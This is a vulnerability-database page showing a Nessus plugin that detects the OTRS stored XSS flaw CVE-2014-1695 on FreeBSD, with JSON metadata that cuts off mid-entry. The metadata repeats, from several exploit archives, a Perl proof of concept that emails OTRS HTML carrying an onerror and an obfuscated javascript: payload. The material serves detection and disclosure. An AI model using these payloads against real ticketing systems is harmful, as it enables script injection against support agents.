Search...

FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)

2014-02-26T00:00:00

ID FREEBSD_PKG_70B72A529E5411E3BABE60A44C524F57.NASL
Type nessus
Reporter This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2014-02-26T00:00:00

Description

The OTRS Project reports :

An attacker could send a specially prepared HTML email to OTRS. If he can then trick an agent into following a special link to display this email, JavaScript code would be executed.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
#    copyright notice, this list of conditions and the following
#    disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
#    published online in any format, converted to PDF, PostScript,
#    RTF and other formats) must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer
#    in the documentation and/or other materials provided with the
#    distribution.
# 
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(72696);
  script_version("1.9");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2014-1695");

  script_name(english:"FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)");
  script_summary(english:"Checks for updated packages in pkg_info output");

  script_set_attribute(
    attribute:"synopsis", 
    value:
"The remote FreeBSD host is missing one or more security-related
updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"The OTRS Project reports :

An attacker could send a specially prepared HTML email to OTRS. If he
can then trick an agent into following a special link to display this
email, JavaScript code would be executed."
  );
  # https://www.otrs.com/security-advisory-2014-03-xss-issue/
  script_set_attribute(
    attribute:"see_also",
    value:"https://otrs.com"
  );
  # https://vuxml.freebsd.org/freebsd/70b72a52-9e54-11e3-babe-60a44c524f57.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?1a4f58fd"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:otrs");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/25");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/02/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/02/26");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FreeBSD Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");

  exit(0);
}


include("audit.inc");
include("freebsd_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (pkg_test(save_report:TRUE, pkg:"otrs&lt;3.1.20")) flag++;
if (pkg_test(save_report:TRUE, pkg:"otrs&gt;3.2.*&lt;3.2.15")) flag++;
if (pkg_test(save_report:TRUE, pkg:"otrs&gt;3.3.*&lt;3.3.5")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_warning(port:0, extra:pkg_report_get());
  else security_warning(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "FREEBSD_PKG_70B72A529E5411E3BABE60A44C524F57.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)", "description": "The OTRS Project reports :\n\nAn attacker could send a specially prepared HTML email to OTRS. If he\ncan then trick an agent into following a special link to display this\nemail, JavaScript code would be executed.", "published": "2014-02-26T00:00:00", "modified": "2014-02-26T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://www.tenable.com/plugins/nessus/72696", "reporter": "This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?1a4f58fd", "https://otrs.com"], "cvelist": ["CVE-2014-1695"], "type": "nessus", "lastseen": "2021-01-07T10:45:32", "edition": 22, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-1695"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:547FEE8AB5755B73089DAB4C1DD1B2B9"]}, {"type": "freebsd", "idList": ["70B72A52-9E54-11E3-BABE-60A44C524F57"]}, {"type": "exploitdb", "idList": ["EDB-ID:36842"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2014-054.NASL", "DEBIAN_DLA-1119.NASL", "OPENSUSE-2014-202.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30637", "SECURITYVULNS:VULN:13733"]}, {"type": "zdt", "idList": ["1337DAY-ID-23570"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131654"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891119", "OPENVAS:1361412562310804243"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1119-1:89666"]}], "modified": "2021-01-07T10:45:32", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2021-01-07T10:45:32", "rev": 2}, "vulnersScore": 5.2}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72696);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-1695\");\n\n script_name(english:\"FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The OTRS Project reports :\n\nAn attacker could send a specially prepared HTML email to OTRS. If he\ncan then trick an agent into following a special link to display this\nemail, JavaScript code would be executed.\"\n );\n # https://www.otrs.com/security-advisory-2014-03-xss-issue/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://otrs.com\"\n );\n # https://vuxml.freebsd.org/freebsd/70b72a52-9e54-11e3-babe-60a44c524f57.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1a4f58fd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:otrs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"otrs<3.1.20\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"otrs>3.2.*<3.2.15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"otrs>3.3.*<3.3.5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "72696", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:otrs"], "scheme": null, "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T06:14:27", "description": "Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML email.", "edition": 4, "cvss3": {}, "published": "2014-03-01T00:01:00", "title": "CVE-2014-1695", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1695"], "modified": "2015-10-13T16:35:00", "cpe": ["cpe:/a:otrs:otrs:3.1.3", "cpe:/a:otrs:otrs:3.1.2", "cpe:/a:otrs:otrs:3.2.10", "cpe:/a:otrs:otrs:3.1.5", "cpe:/a:otrs:otrs:3.1.14", "cpe:/a:otrs:otrs:3.1.19", "cpe:/a:otrs:otrs:3.2.6", "cpe:/a:otrs:otrs:3.2.2", "cpe:/a:otrs:otrs:3.1.6", "cpe:/a:otrs:otrs:3.2.3", "cpe:/a:otrs:otrs:3.1.8", "cpe:/a:otrs:otrs:3.1.15", "cpe:/a:otrs:otrs:3.1.9", "cpe:/a:otrs:otrs:3.1.11", "cpe:/a:otrs:otrs:3.2.0", "cpe:/a:otrs:otrs:3.2.8", "cpe:/a:otrs:otrs:3.1.0", "cpe:/a:otrs:otrs:3.3.1", "cpe:/a:otrs:otrs:3.3.4", "cpe:/a:otrs:otrs:3.2.14", "cpe:/a:otrs:otrs:3.1.10", "cpe:/a:otrs:otrs:3.3.2", "cpe:/a:otrs:otrs:3.3.3", "cpe:/a:otrs:otrs:3.3.0", "cpe:/a:otrs:otrs:3.1.13", "cpe:/a:otrs:otrs:3.2.7", "cpe:/a:otrs:otrs:3.2.5", "cpe:/a:otrs:otrs:3.1.17", "cpe:/a:otrs:otrs:3.2.4", "cpe:/a:otrs:otrs:3.2.1", "cpe:/a:otrs:otrs:3.1.16", "cpe:/a:otrs:otrs:3.1.1", "cpe:/a:otrs:otrs:3.1.18", "cpe:/a:otrs:otrs:3.1.7", "cpe:/a:otrs:otrs:3.1.4", "cpe:/a:otrs:otrs:3.2.9"], "id": "CVE-2014-1695", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1695", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:otrs:otrs:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.3.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:otrs:otrs:3.1.3:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:38", "description": "\nOTRS 3.1.x 3.2.x 3.3.x - Persistent Cross-Site Scripting", "edition": 1, "published": "2015-04-27T00:00:00", "title": "OTRS 3.1.x 3.2.x 3.3.x - Persistent Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1695"], "modified": "2015-04-27T00:00:00", "id": "EXPLOITPACK:547FEE8AB5755B73089DAB4C1DD1B2B9", "href": "", "sourceData": "# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS\n# Date: 28.01.2014\n# Exploit Author: Adam Ziaja http://adamziaja.com\n# Vendor Homepage: https://www.otrs.com\n# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5\n# CVE : CVE-2014-1695\n\n#!/usr/bin/perl -w\nuse strict;\nuse MIME::Lite;\nmy $msg = MIME::Lite->new(\n Subject => 'OTRS XSS PoC',\n From => 'attacker@example.com',\n To => 'otrs@example.com',\n Type => 'text/html',\n Data =>\n '<html><body><img/onerror=\"alert(\\'XSS1\\')\"src=a><iframe\nsrc=javasc&#x72ipt:alert(\\'XSS2\\') ></body></html>'\n);\n$msg->send();", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1695"], "description": "\nThe OTRS Project reports:\n\nAn attacker could send a specially prepared HTML email to OTRS. If\nhe can then trick an agent into following a special link to display this email,\nJavaScript code would be executed.\n\n", "edition": 4, "modified": "2014-02-25T00:00:00", "published": "2014-02-25T00:00:00", "id": "70B72A52-9E54-11E3-BABE-60A44C524F57", "href": "https://vuxml.freebsd.org/freebsd/70b72a52-9e54-11e3-babe-60a44c524f57.html", "title": "otrs -- XSS Issue", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T04:29:24", "description": "OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS). CVE-2014-1695. Webapps exploit for php platform", "published": "2015-04-27T00:00:00", "type": "exploitdb", "title": "OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1695"], "modified": "2015-04-27T00:00:00", "id": "EDB-ID:36842", "href": "https://www.exploit-db.com/exploits/36842/", "sourceData": "# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS\r\n# Date: 28.01.2014\r\n# Exploit Author: Adam Ziaja http://adamziaja.com\r\n# Vendor Homepage: https://www.otrs.com\r\n# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5\r\n# CVE : CVE-2014-1695\r\n\r\n#!/usr/bin/perl -w\r\nuse strict;\r\nuse MIME::Lite;\r\nmy $msg = MIME::Lite->new(\r\n Subject => 'OTRS XSS PoC',\r\n From => 'attacker@example.com',\r\n To => 'otrs@example.com',\r\n Type => 'text/html',\r\n Data =>\r\n '<html><body><img/onerror=\"alert(\\'XSS1\\')\"src=a><iframe\r\nsrc=javasc&#x72ipt:alert(\\'XSS2\\') ></body></html>'\r\n);\r\n$msg->send();\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/36842/"}], "zdt": [{"lastseen": "2018-03-03T03:41:45", "description": "Exploit for php platform in category web applications", "edition": 2, "published": "2015-04-27T00:00:00", "type": "zdt", "title": "OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS) Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1695"], "modified": "2015-04-27T00:00:00", "id": "1337DAY-ID-23570", "href": "https://0day.today/exploit/description/23570", "sourceData": "# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS\r\n# Date: 28.01.2014\r\n# Exploit Author: Adam Ziaja http://adamziaja.com\r\n# Vendor Homepage: https://www.otrs.com\r\n# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5\r\n# CVE : CVE-2014-1695\r\n \r\n#!/usr/bin/perl -w\r\nuse strict;\r\nuse MIME::Lite;\r\nmy $msg = MIME::Lite->new(\r\n Subject => 'OTRS XSS PoC',\r\n From => '[email\u00a0protected]',\r\n To => '[email\u00a0protected]',\r\n Type => 'text/html',\r\n Data =>\r\n '<html><body><img/onerror=\"alert(\\'XSS1\\')\"src=a><iframe\r\nsrc=javasc&#x72ipt:alert(\\'XSS2\\') ></body></html>'\r\n);\r\n$msg->send();\n\n# 0day.today [2018-03-03] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23570"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:59", "description": "", "published": "2015-04-27T00:00:00", "type": "packetstorm", "title": "OTRS 3.x Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1695"], "modified": "2015-04-27T00:00:00", "id": "PACKETSTORM:131654", "href": "https://packetstormsecurity.com/files/131654/OTRS-3.x-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS \n# Date: 28.01.2014 \n# Exploit Author: Adam Ziaja http://adamziaja.com \n# Vendor Homepage: https://www.otrs.com \n# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 \n# CVE : CVE-2014-1695 \n \n#!/usr/bin/perl -w \nuse strict; \nuse MIME::Lite; \nmy $msg = MIME::Lite->new( \nSubject => 'OTRS XSS PoC', \nFrom => 'attacker@example.com', \nTo => 'otrs@example.com', \nType => 'text/html', \nData => \n'<html><body><img/onerror=\"alert(\\'XSS1\\')\"src=a><iframe \nsrc=javasc&#x72ipt:alert(\\'XSS2\\') ></body></html>' \n); \n$msg->send(); \n \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131654/otrs31x-xss.txt"}], "nessus": [{"lastseen": "2021-01-20T12:27:26", "description": "The OTRS ticket system was updated to 3.1.20 / 3.2.15 :\n\nOn openSUSE 12.3 it was updated to 3.1.20: (fix for OSA-2014-03,\nCVE-2014-1695)\n\n - Improved HTML filter.\n\n - 3.1.19 2014-01-28\n\n - Fixed bug#10158 - Missing quoting in\n State::StateGetStatesByType().\n\n - Fixed bug#10099 - Missing challenge token checks on\n customer interface.\n\n - Fixed bug#8489 - setting Tickets per page resets\n AgentTicketQueue.\n\n - Fixed bug#9661 - Useless code in DynamicField backend.\n\n - Fixed bug#9622 - Actions in Small ticket overview don't\n work when cookies are turned off.\n\n - Fixed bug#9541 - Package manager cannot use https proxy.\n\n - Fixed bug#9594 - No auto-reply sent with multiple From\n addresses in AgentTicketPhone on PostgreSQL and Oracle.\n\n - Fixed bug#3434 - Validity of search time frame not\n checked by OTRS.\n\n - Fixed bug#9596 - On merge and bounce screens is\n confusing when fill or not 'To', 'Subject' and 'Body'\n fields.\n\n - Fixed bug#9595 - Incomplete page reload handling in\n merge and bounce.\n\n - Fixed bug#3007 - CheckMXRecord and CheckEmailAddresses\n have no effect on AgentTicketBounce.\n\n - Fixed bug#9512 - Database error for invalid date in\n AgentTicketSearch.\n\n - Fixed bug#8835 - No article found for TicketID <TICKET\n ID> when showing group tickets\n\n - Fixed bug#9583 - Dynamic Fields of type Date have\n timestamp in notifications.\n\n - Fixed bug#9579 - SOAP Serializer used in\n Kernel/GenericInterface/Transport/ HTTP/SOAP.pm does not\n correctly set namespace.\n\n - Fixed bug#7359 - Setting pending states via generic\n agent does not set pending time.\n\n - Fixed bug#8380 - Middle name not displayed in\n AdminCustomerUser.\n\n - Fixed bug#9576 - GI TicketSearch Date and Date/Time\n dynamic fields are ignored.\n\n - Changed Dynamic Field SearchFieldParameterBuild() API,\n LayoutObject is now optional.\n\n - Fixed bug#9573 - Date and DateTime dynamic fields not\n considered in GenericAgent Jobs.\n\nOn openSUSE 13.1 it was updated to 3.2.15: (fix for OSA-2014-03,\nCVE-2014-1695)\n\n - Improved HTML filter.\n\n - Fixed bug#10207 - DynamicField Search-Function in\n CustomerFrontend is not working.\n\n - Followup for bug#9011 - New value after value mapping\n can't be 0.\n\n - Fixed bug#10214 - Value '0' for DynamicsFields prevents\n TicketCreation.\n\n - Fixed bug#9616 - Too long activities and transitions are\n not displayed correctly.\n\n - Fixed bug#10212 - My tickets & Company tickets in 3.3.4.\n\n - Fixed bug#10205 - GenericInterface: Mandatory TimeUnits\n can't be 0.\n\n - Fixed bug#10196 - Ticket merge action does not notify\n the owner of the existing ticket.\n\n - Fixed bug#9692 - On PhoneOutbound articles, the FROM\n field shows Customer ID instead Agent ID.\n\n - Fixed bug#10189 - ProcessManagement: Use article subject\n if no ticket title is set.\n\n - Fixed bug#9654 - TicketUpdate operation doesn't work\n when authenticated as a customer.\n\n - Fixed bug#10137 - Generic interface TicketCreate\n operation doesn't work when authenticated as a customer.\n\n - 3.2.14\n\n - Fixed bug#10172 - Can't create process tickets with\n disabled richtext.\n\n - Fixed bug#10121 - QQMails break in OTRS.\n\n - Fixed bug#10158 - Missing quoting in\n State::StateGetStatesByType().\n\n - Fixed bug#8969 - FAQ module Language files installation\n fails (Kernel/Language permissions).\n\n - Fixed bug#9959 - & breaks ExpandCustomerName.\n\n - Fixed bug#10099 - Missing challenge token checks on\n customer interface.\n\n - Fixed bug#10103 - ArticleTypeID is always undef in\n AgentTicketCompose.\n\n - Added functionality to disable access to tickets of\n other customers with the same customer company in\n customer interface.\n\n - Fixed bug#9650 - Special character in customer id breaks\n Open Tickets in AgentTicketZoom.\n\n - Fixed bug#9723 - TicketAccountedTime stat does not run\n on Oracle with many tickets\n\n - Fixed bug#10077 - regular expressions in postmaster\n filter return 1 if no regex match.\n\n - Fixed bug#10070 - Wrong error message if Transition\n contains no transition actions.", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : otrs (openSUSE-SU-2014:0360-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1695"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:otrs-itsm", "p-cpe:/a:novell:opensuse:otrs", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-202.NASL", "href": "https://www.tenable.com/plugins/nessus/75286", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-202.\n#\n# The text description of this plugin is (C) SUSE 